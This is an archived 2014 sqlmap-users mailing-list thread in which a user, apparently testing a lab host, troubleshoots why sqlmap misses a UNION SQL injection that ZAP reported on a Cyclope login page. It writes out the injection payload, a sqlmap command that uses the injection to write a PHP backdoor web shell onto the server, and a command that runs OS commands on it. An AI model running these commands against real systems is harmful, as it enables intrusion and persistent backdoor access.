Re: [sqlmap-users] File Write Error
From: Miroslav S. <mir...@gm...> - 2014-03-21 18:11:59
There is always a 302 redirect, so I am not sure how ZAP detected this as a SQLi.

Kind regards,
Miroslav Stampar

On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote:

> Thanks for the quick response, Miroslav and Bernardo. It's very much
> appreciated! There is a UNION technique that is being reported by ZAP, but
> sqlmap isn't finding it and I haven't quite figured out how to simply tell
> it what to use explicitly. ZAP detects a UNION vulnerability on
> activate.php:
>
> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP"
>
> My attempts to input this have not been successful, so I'm not sure if
> it's a false positive or I'm not using sqlmap quite right (more likely).
>
> CMDLINE
> sqlmap -u "http://172.16.71.138:7879/activate.php"
> --data='act=auth-login&page=login&username=admin&password=admin' -p
> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL
> select NULL --"
>
> As for the previous method, here's the attached file (on screen output was
> massive - password is "password"). End result "[09:01:51] [CRITICAL] all
> tested parameters appear to be not injectable. Also, you can try to rerun
> by providing either a valid value for option '--string' (or '--regexp')"
>
> Thanks for the help!
>
> Brian
>
> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. <ber...@gm...> wrote:
>
>> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> wrote:
>> > [...]
>> > All in all, can you please relaunch sqlmap (make sure you run git pull
>> > first to sync to the GitHub repository) with the following syntax:
>>
>> Command line:
>>
>> python sqlmap.py -u "http://172.16.71.138:7879/index.php"
>> --data="act=auth-login&pag=login&username=admin&password=admin" -p
>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3
>> --parse-errors -t traffic.log --answers "language does the web server
>> support=4,do you want to use for writable=2,comma separate list of
>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y"
>>
>> Feel free to report back the result, the entire standard output of
>> sqlmap and send me the traffic.log.
>>
>> Thank you.
>> Bernardo

--
Miroslav Stampar
http://about.me/stamparm